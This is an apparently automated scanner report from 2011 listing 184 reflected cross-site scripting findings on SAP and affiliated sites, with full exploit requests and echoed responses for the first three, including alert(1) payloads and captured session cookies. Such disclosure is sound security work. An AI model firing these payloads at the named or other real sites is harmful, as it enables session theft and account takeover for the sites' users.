XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, sap.com

CWE-79 | Unsanitized User Input | CAPEC-86

Report generated by XSS.CX at Sun Nov 13 21:11:19 CST 2011.

Loading



1. Cross-site scripting (reflected)

1.1. http://connect.sap.com/WebID/IISWebAgentIF.dll [GetPic?image parameter]

1.2. https://cw.sdn.sap.com/cw/community/ideas [dbedd'-alert(1)-'400de4f3298 parameter]

1.3. https://cw.sdn.sap.com/cw/community/ideas [name of an arbitrarily supplied request parameter]

1.4. https://cw.sdn.sap.com/cw/ideas/6794 [REST URL parameter 2]

1.5. https://cw.sdn.sap.com/cw/ideas/6794 [REST URL parameter 3]

1.6. https://cw.sdn.sap.com/cw/ideas/6794 [name of an arbitrarily supplied request parameter]

1.7. https://cw.sdn.sap.com/cw/ideas/6794 [name of an arbitrarily supplied request parameter]

1.8. http://forums.sdn.sap.com/message.jspa [messageID parameter]

1.9. http://forums.sdn.sap.com/message.jspa [name of an arbitrarily supplied request parameter]

1.10. http://forums.sdn.sap.com/message.jspa [name of an arbitrarily supplied request parameter]

1.11. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]

1.12. http://forums.sdn.sap.com/thread.jspa [threadID parameter]

1.13. http://forums.sdn.sap.com/thread.jspa [threadID parameter]

1.14. http://forums400.sdn.sap.com/thread.jspa [9751ab?xss parameter]

1.15. http://forums400.sdn.sap.com/thread.jspa [9c165%3C/script%3E%3Ca%3E35be9e751ab parameter]

1.16. http://forums400.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]

1.17. http://forums400.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]

1.18. http://forums400.sdn.sap.com/thread.jspa [threadID parameter]

1.19. http://help.sap.com/bestpractices [REST URL parameter 1]

1.20. http://help.sap.com/boall/ [REST URL parameter 1]

1.21. http://help.sap.com/fstatic/js/help.js [REST URL parameter 2]

1.22. http://help.sap.com/fstatic/js/help.js [REST URL parameter 3]

1.23. http://help.sap.com/fstatic/js/jquery-1.5.2.min.js [REST URL parameter 2]

1.24. http://help.sap.com/fstatic/js/jquery-1.5.2.min.js [REST URL parameter 3]

1.25. http://help.sap.com/fstatic/staticimg/active.png [REST URL parameter 2]

1.26. http://help.sap.com/fstatic/staticimg/active.png [REST URL parameter 3]

1.27. http://help.sap.com/fstatic/staticimg/bg_diag_gray.gif [REST URL parameter 2]

1.28. http://help.sap.com/fstatic/staticimg/bg_diag_gray.gif [REST URL parameter 3]

1.29. http://help.sap.com/fstatic/staticimg/favicon.ico [REST URL parameter 2]

1.30. http://help.sap.com/fstatic/staticimg/favicon.ico [REST URL parameter 3]

1.31. http://help.sap.com/fstatic/staticimg/sprites.png [REST URL parameter 2]

1.32. http://help.sap.com/fstatic/staticimg/sprites.png [REST URL parameter 3]

1.33. http://help.sap.com/fstatic/stylesheets/help.css [REST URL parameter 2]

1.34. http://help.sap.com/fstatic/stylesheets/help.css [REST URL parameter 3]

1.35. http://help.sap.com/fstatic/stylesheets/print.css [REST URL parameter 2]

1.36. http://help.sap.com/fstatic/stylesheets/print.css [REST URL parameter 3]

1.37. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]

1.38. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]

1.39. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]

1.40. http://sales.liveperson.net/hc/37021986/ [msessionkey parameter]

1.41. http://sap.webex.com/dispatcher/dispatcher.do [REST URL parameter 1]

1.42. https://sap.webex.com/cmp0306lc/webcomponents/widget/detect.do [REST URL parameter 1]

1.43. https://sap.webex.com/cmp0306lc/webcomponents/widget/detect.do [REST URL parameter 2]

1.44. https://sap.webex.com/cmp0306lc/webcomponents/widget/detect.do [REST URL parameter 3]

1.45. https://sap.webex.com/mw0306lc/mywebex/default.do [REST URL parameter 1]

1.46. https://sap.webex.com/mw0306lc/mywebex/default.do [REST URL parameter 2]

1.47. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mbox parameter]

1.48. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mboxId parameter]

1.49. http://search400.sap.com/ui/ [SAMLResponse parameter]

1.50. https://training.sap.com/us/en/training-locations/ [REST URL parameter 1]

1.51. https://training.sap.com/us/en/training-locations/ [REST URL parameter 2]

1.52. https://training.sap.com/us/en/training-locations/ [xajax parameter]

1.53. https://training.sap.com/us/en/training-locations/us/atlanta,-ga-(kdc [REST URL parameter 4]

1.54. https://training.sap.com/us/en/training-locations/us/atlanta,-ga-(kdc) [REST URL parameter 4]

1.55. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc [REST URL parameter 1]

1.56. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc [REST URL parameter 2]

1.57. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc [REST URL parameter 4]

1.58. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc [xajax parameter]

1.59. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/images/content/pod_jumpstart.jpg [REST URL parameter 4]

1.60. http://weblogs.sdn.sap.com/pub/wlg/27079 [name of an arbitrarily supplied request parameter]

1.61. http://www.sap.com/about/company/legal/copyright/index.epx [REST URL parameter 5]

1.62. http://www.sap.com/about/company/legal/impressum.epx [REST URL parameter 4]

1.63. http://www.sap.com/about/company/legal/privacy.epx [REST URL parameter 4]

1.64. http://www.sap.com/about/company/legal/terms_of_use.epx [REST URL parameter 4]

1.65. http://www.sap.com/business_management_software/inventory_management.epx [REST URL parameter 2]

1.66. http://www.sap.com/communities/index.aspx [REST URL parameter 2]

1.67. http://www.sap.com/contactsap/directory/ [REST URL parameter 1]

1.68. http://www.sap.com/corporate-en/our-company/legal/copyright/ [REST URL parameter 1]

1.69. http://www.sap.com/corporate-en/our-company/legal/copyright/ [REST URL parameter 2]

1.70. http://www.sap.com/global/client_functions.js [REST URL parameter 1]

1.71. http://www.sap.com/global/css/Flyouts.css [REST URL parameter 1]

1.72. http://www.sap.com/global/css/MainContentPanel.css [REST URL parameter 1]

1.73. http://www.sap.com/global/css/MainLeftPanel.css [REST URL parameter 1]

1.74. http://www.sap.com/global/css/MainRightPanel.css [REST URL parameter 1]

1.75. http://www.sap.com/global/css/dropdownlist.css [REST URL parameter 1]

1.76. http://www.sap.com/global/css/rm_css/rm_iframe_css.css [REST URL parameter 1]

1.77. http://www.sap.com/global/js/FormEngine.js [REST URL parameter 1]

1.78. http://www.sap.com/global/js/addthis_widget.js [REST URL parameter 1]

1.79. http://www.sap.com/global/js/client_player.js [REST URL parameter 1]

1.80. http://www.sap.com/global/js/dropdownlist.js [REST URL parameter 1]

1.81. http://www.sap.com/global/js/jquery-1_3_2/jquery-1.3.2.min.js [REST URL parameter 1]

1.82. http://www.sap.com/global/js/menu.js [REST URL parameter 1]

1.83. http://www.sap.com/global/js/remote.js [REST URL parameter 1]

1.84. http://www.sap.com/global/js/rm_js/rm_browser.js [REST URL parameter 1]

1.85. http://www.sap.com/global/js/rm_js/rm_dhtml.js [REST URL parameter 1]

1.86. http://www.sap.com/global/js/rm_js/rm_iframe.js [REST URL parameter 1]

1.87. http://www.sap.com/global/js/roiengine.js [REST URL parameter 1]

1.88. http://www.sap.com/global/js/sap_flash_js.js [REST URL parameter 1]

1.89. http://www.sap.com/global/js/search.js [REST URL parameter 1]

1.90. http://www.sap.com/global/js/workspace.js [REST URL parameter 1]

1.91. http://www.sap.com/global/tracking/js/s_code.js [REST URL parameter 1]

1.92. http://www.sap.com/global/ui/css/print.css [REST URL parameter 1]

1.93. http://www.sap.com/global/ui/css/sapcom.css [REST URL parameter 1]

1.94. http://www.sap.com/global/ui/css/sapcom_countryselector.css [REST URL parameter 1]

1.95. http://www.sap.com/global/ui/css/securelayers.css [REST URL parameter 1]

1.96. http://www.sap.com/global/ui/fonts/90a77a6d-79fe-4845-96a8-b6dadd7d52a4-1.ttf [REST URL parameter 1]

1.97. http://www.sap.com/global/ui/fonts/90a77a6d-79fe-4845-96a8-b6dadd7d52a4-3.woff [REST URL parameter 1]

1.98. http://www.sap.com/global/ui/js/common.js [REST URL parameter 1]

1.99. http://www.sap.com/global/ui/js/functionsandplugins.js [REST URL parameter 1]

1.100. http://www.sap.com/global/ui/js/head.js [REST URL parameter 1]

1.101. http://www.sap.com/global/ui/js/jquery-ui.js [REST URL parameter 1]

1.102. http://www.sap.com/global/ui/js/jquery.js [REST URL parameter 1]

1.103. http://www.sap.com/global/ui/js/mbox.js [REST URL parameter 1]

1.104. http://www.sap.com/global/ui/js/mtagconfig.js [REST URL parameter 1]

1.105. http://www.sap.com/global/ui/js/pageload.js [REST URL parameter 1]

1.106. http://www.sap.com/global/ui/js/samlscript.js [REST URL parameter 1]

1.107. http://www.sap.com/global/ui/js/samlsessionscript.js [REST URL parameter 1]

1.108. http://www.sap.com/global/ui/js/securedforms.js [REST URL parameter 1]

1.109. http://www.sap.com/global/ui/js/securelayers.js [REST URL parameter 1]

1.110. http://www.sap.com/global/ui/js/survey.js [REST URL parameter 1]

1.111. http://www.sap.com/global/ui/js/trackinghelper.js [REST URL parameter 1]

1.112. http://www.sap.com/global/ui/richmedia/css/UMP/rm_UMP_css.css [REST URL parameter 1]

1.113. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP.js [REST URL parameter 1]

1.114. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_cc.js [REST URL parameter 1]

1.115. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_chapter.js [REST URL parameter 1]

1.116. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_controls.js [REST URL parameter 1]

1.117. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_cta.js [REST URL parameter 1]

1.118. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_rollover.js [REST URL parameter 1]

1.119. http://www.sap.com/global/ui/richmedia/js/require.js [REST URL parameter 1]

1.120. http://www.sap.com/global/ui/richmedia/js/utils/rm_UMP_config.js [REST URL parameter 1]

1.121. http://www.sap.com/global/ui/richmedia/js/utils/rm_browser.js [REST URL parameter 1]

1.122. http://www.sap.com/global/ui/richmedia/js/utils/rm_console.js [REST URL parameter 1]

1.123. http://www.sap.com/global/ui/richmedia/js/utils/rm_data.js [REST URL parameter 1]

1.124. http://www.sap.com/global/ui/richmedia/js/utils/rm_dhtml.js [REST URL parameter 1]

1.125. http://www.sap.com/global/ui/richmedia/js/utils/rm_getcss.js [REST URL parameter 1]

1.126. http://www.sap.com/global/ui/richmedia/js/utils/rm_indexOf.js [REST URL parameter 1]

1.127. http://www.sap.com/global/ui/richmedia/js/utils/rm_initializer.js [REST URL parameter 1]

1.128. http://www.sap.com/global/ui/richmedia/js/utils/rm_uniqueId.js [REST URL parameter 1]

1.129. http://www.sap.com/global/unified/css/StageHeaderMainFooter.css [REST URL parameter 1]

1.130. http://www.sap.com/gwtservices/httpBridge.epx [REST URL parameter 1]

1.131. http://www.sap.com/news-reader/ [REST URL parameter 1]

1.132. http://www.sap.com/print/global/ui/css/sapcom_countryselector.css [REST URL parameter 1]

1.133. http://www.sap.com/sitemap.aspx [REST URL parameter 1]

1.134. http://www.sap.com/sitemap.aspx [REST URL parameter 1]

1.135. http://www.sap.com/social/index.aspx [REST URL parameter 2]

1.136. http://www.sap.com/solutions/mobility-solutions/index.epx [REST URL parameter 3]

1.137. http://www.sap.com/text/global/ui/css/sapcom_countryselector.css [REST URL parameter 1]

1.138. http://www.sap.com/usa/sme/index.epx [REST URL parameter 3]

1.139. http://www.sap.com/usa/sme/index.epx%20 [REST URL parameter 3]

1.140. https://www.sap.com/gwtservices/httpBridge.epx [REST URL parameter 1]

1.141. https://www.sap.com/profile/samlrequest.epx [password parameter]

1.142. https://www.sap.com/profile/samlrequest.epx [userid parameter]

1.143. http://www.sdn.sap.com/irj/scn/about [name of an arbitrarily supplied request parameter]

1.144. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 [REST URL parameter 7]

1.145. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 [REST URL parameter 8]

1.146. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 [REST URL parameter 9]

1.147. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 [overridelayout parameter]

1.148. http://www.sdn.sap.com/irj/scn/index [overridelayout parameter]

1.149. http://www.sdn.sap.com/irj/scn/index [rid parameter]

1.150. http://www.sdn.sap.com/irj/scn/submitcontent [name of an arbitrarily supplied request parameter]

1.151. http://www.sdn.sap.com/irj/scn/weblogs [blog parameter]

1.152. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]

1.153. http://www.sdn.sap.com/irj/sdn [name of an arbitrarily supplied request parameter]

1.154. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]

1.155. http://www.sdn.sap.com/irj/sdn/logon [redirect parameter]

1.156. https://www.sdn.sap.com/irj/scn/register [displayName parameter]

1.157. https://www.sdn.sap.com/irj/scn/register [email parameter]

1.158. https://www.sdn.sap.com/irj/scn/register [firstName parameter]

1.159. https://www.sdn.sap.com/irj/scn/register [lastName parameter]

1.160. http://www400.sdn.sap.com/irj/boc [name of an arbitrarily supplied request parameter]

1.161. http://www400.sdn.sap.com/irj/scn/help-portal [name of an arbitrarily supplied request parameter]

1.162. http://www400.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]

1.163. http://www400.sdn.sap.com/irj/scn/logon [redirect parameter]

1.164. http://www400.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]

1.165. http://www400.sdn.sap.com/irj/sdn/logon [redirect parameter]

1.166. https://connectblrl02.sap.com/download_plugin.php3 [Referer HTTP header]

1.167. https://connectsha01.sap.com/download_plugin.php3 [Referer HTTP header]

1.168. https://connecttyo01.sap.com/download_plugin.php3 [Referer HTTP header]

1.169. https://www.sap.com/campaign/training-certification/register.epx [Referer HTTP header]

1.170. https://connectblrl02.sap.com/my.logon.php3 [VHOST cookie]

1.171. https://connectsha01.sap.com/my.logon.php3 [VHOST cookie]

1.172. https://connectsin01.sap.com/my.logon.php3 [VHOST cookie]

1.173. https://connectsyd01.sap.com/my.logon.php3 [VHOST cookie]

1.174. https://connecttyo01.sap.com/my.logon.php3 [VHOST cookie]

1.175. https://connectvan01.sap.com/my.logon.php3 [VHOST cookie]

1.176. http://sales.liveperson.net/hc/37021986/ [HumanClickKEY cookie]

1.177. http://ssl-hints.netflame.cc/service/cookies.js/2104830679 [fcP.648765de68b1d3c7 cookie]

1.178. http://ssl-hints.netflame.cc/service/cookies.js/35219521 [fcC.648765de68b1d3c7 cookie]

1.179. http://ssl-hints.netflame.cc/service/cookies.js/35219521 [fcP.648765de68b1d3c7 cookie]

1.180. http://ssl-hints.netflame.cc/service/cookies.js/35219521 [fcR.648765de68b1d3c7 cookie]

1.181. http://ssl-hints.netflame.cc/service/cookies.js/44128282 [fcC.648765de68b1d3c7 cookie]

1.182. http://ssl-hints.netflame.cc/service/cookies.js/44128282 [fcP.648765de68b1d3c7 cookie]

1.183. http://ssl-hints.netflame.cc/service/cookies.js/44128282 [fcR.648765de68b1d3c7 cookie]

1.184. https://www.sap.com/omni.epx [SAP.TTC cookie]



1. Cross-site scripting (reflected)
There are 184 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://connect.sap.com/WebID/IISWebAgentIF.dll [GetPic?image parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://connect.sap.com
Path:   /WebID/IISWebAgentIF.dll

Issue detail

The value of the GetPic?image request parameter is copied into the HTML document as plain text between tags. The payload ff98d<img%20src%3da%20onerror%3dalert(1)>477fb398b41 was submitted in the GetPic?image parameter. This input was echoed as ff98d<img src=a onerror=alert(1)>477fb398b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /WebID/IISWebAgentIF.dll?GetPic?image=rsalogoff98d<img%20src%3da%20onerror%3dalert(1)>477fb398b41 HTTP/1.1
Host: connect.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://connect.sap.com/WebID/IISWebAgentIF.dll
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 19:16:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html

<HTML>
<HEAD><TITLE>RSA Web Access Authentication Extension Error</TITLE></HEAD>
<BODY><H1>RSA Web Access Authentication Extension Error.</H1>
<HR>
<H2>Failed to load file template: rsalogoff98d<img src=a onerror=alert(1)>477fb398b41.jpg. Please contact your administrator.</H2>
...[SNIP]...

1.2. https://cw.sdn.sap.com/cw/community/ideas [dbedd'-alert(1)-'400de4f3298 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cw.sdn.sap.com
Path:   /cw/community/ideas

Issue detail

The value of the dbedd'-alert(1)-'400de4f3298 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3974'-alert(1)-'0bf57f6bdb7 was submitted in the dbedd'-alert(1)-'400de4f3298 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cw/community/ideas?dbedd'-alert(1)-'400de4f3298=1f3974'-alert(1)-'0bf57f6bdb7 HTTP/1.1
Host: cw.sdn.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://cw.sdn.sap.com/cw/community/ideas?dbedd'-alert(1)-'400de4f3298=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: jive.server.info=serverName=cw.sdn.sap.com:serverPort=443:contextPath=/cw:localName=cw.sdn.sap.com:localPort=443:localAddr=155.56.92.28; jive.recentHistory.-1=31342c393132373b; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; saplb_*=(J2EE8941820)8941850; JSESSIONID=gROqO92skdomEcoSLD2WlwwKv3KeMwEacYgA_SAP4t5_fXAzoPOjk1yqwUqPpcBv; SDNSTATE_CW=3563327660.14340.0000; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); shpuvid=172.16.92.241.1321213592635805; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2flogon%3fredirect%3d%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=session#1321213478215-608827#1321215758|check#true#1321213958; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Alogon%7C1321215697386%3B%20pe%3Dno%2520value%7C1321215697396%3B%20c3%3Dno%2520value%7C1321215697402%3B%20s_nr%3D1321213897415-Returning%7C1323805897415%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813897420%3B%20s_visit%3D1%7C1321215697422%3B%20gpv_p47%3Dno%2520value%7C1321215697426%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D11%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
Content-Type: text/html; charset=UTF-8
x-jal: 511
JP: D=573951 t=1321214212284925
Content-Length: 234022
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:56:52 GMT
Connection: keep-alive
Set-Cookie: saplb_*=(J2EE8941720)8941750; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c393132373b; Expires=Tue, 13-Dec-2011 19:56:52 GMT; Path=/cw

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
k that the required system properties are set!.");
}else{
window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/community/ideas?dbedd'-alert(1)-'400de4f3298=1f3974'-alert(1)-'0bf57f6bdb7');
}
}
function scnLogOffRedirect(url, jiveURL) {
if(url == null){
alert("The link URL is missing, Please check that the required system propert
...[SNIP]...

1.3. https://cw.sdn.sap.com/cw/community/ideas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cw.sdn.sap.com
Path:   /cw/community/ideas

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbedd'-alert(1)-'400de4f3298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cw/community/ideas?dbedd'-alert(1)-'400de4f3298=1 HTTP/1.1
Host: cw.sdn.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; 